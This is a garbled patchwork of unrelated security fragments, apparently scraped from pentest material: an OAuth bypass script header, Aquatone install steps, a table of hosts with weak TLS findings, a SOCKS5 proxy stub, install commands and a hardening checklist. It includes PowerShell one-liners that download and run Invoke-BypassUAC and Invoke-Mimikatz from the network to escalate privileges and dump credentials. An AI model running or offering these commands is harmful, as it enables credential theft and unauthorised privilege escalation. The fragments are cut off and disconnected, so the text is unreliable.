#!/usr/bin/env python3
# Authentication bypass via OAuth implicit flow
from bs4 import BeautifulSoup
import requests
import sys
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

# AQUATONE
Aquatone is a tool for visual inspection of websites across a large number of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.
## Installation
1. Install [Google Chrome](https://www.google.com/chrome/) or [Chromium](https://www.chromium.org/getting-involved/download-chromium) browser -- **Note:** Google Chrome is currently giving unreliable results when running in *headless* mode, so it is recommended to install Chromium for the best results.
2. Download the [latest release](https://github.com/michenriksen/aquatone/releases/latest) of Aquatone for your operating system.
3. Uncompress the zip file and move the `aquatone` binary to your desired location. You probably want to move it to a location in your `$PATH` for easier use.

# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands

_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __
/ \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ |
/ _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| |
/ ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | |
/_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_|
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)

Affected Hosts FQDN NAT Country Status SSL Certificate Signed Using Weak Hashing Algorithm (Known CA) SSL Certificate Expiry SSL Certificate Chain Contains RSA Keys Less Than 2048 bits SSL Version 2 and 3 Protocol Detection SSL Medium Strength Cipher Suites Supported (SWEET32) SSL RC4 Cipher Suites Supported (Bar Mitzvah) SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam) TLS Version 1.0 Protocol Detection Notes Advice from Mandiant
40.83.150.233 (443/TCP) MSFT P § Minimum Requirements for TLS Servers
40.83.150.233 (454/TCP) MSFT P NIST SP800-52
40.83.150.233 (8172/TCP) MSFT P
52.249.56.193 (443/TCP) MSFT P Azure App Gateway for TEL Customer Avoid any use of the following:
59.124.168.164 (443/TCP) Taiwan P 1. SSLv2, SSLv3, TLS 1.0, and TLS 1.1
61.210.160.152 (443/TCP) Japan P 2. Null / Anonymous cipher suites
61.210.162.134 (443/TCP) Japan P 3. Any export cipher suites and encryption using less than 128 bits
64.124.73

#!/usr/bin/env python3
#
# Open (and create/truncate) foo.txt for binary writing
fo = open("foo.txt", "wb")
print("Name of the file:", fo.name)
# Close opened file
fo.close()

$ curl https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > packages.microsoft.gpg
$ sudo install -o root -g root -m 644 packages.microsoft.gpg /usr/share/keyrings/
$ sudo sh -c 'echo "deb [arch=amd64 signed-by=/usr/share/keyrings/packages.microsoft.gpg] https://packages.microsoft.com/repos/vscode stable main" > /etc/apt/sources.list.d/vscode.list'
$ sudo apt-get install apt-transport-https
$ sudo apt-get update
$ sudo apt-get install code

#!/usr/bin/python
# Filename s5.py
# Python Dynamic Socks5 Proxy
# Usage: python s5.py 1080
# Background Run: nohup python s5.py 1080 &
# Email: ringzero@557.im
import socket, sys, select, SocketServer, struct, time
class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass

curl "https://raw.githubusercontent.com/andreafabrizi/Dropbox-Uploader/master/dropbox_uploader.sh" -o dropbox_uploader.sh

Linux hardening checklist
* Partitioning
* Separate partitions
* Restrict mount options
* Polyinstantiated directories
* Shared memory
* Encrypt partitions
* Summary checklist
* Physical Access
* Password for Single User Mode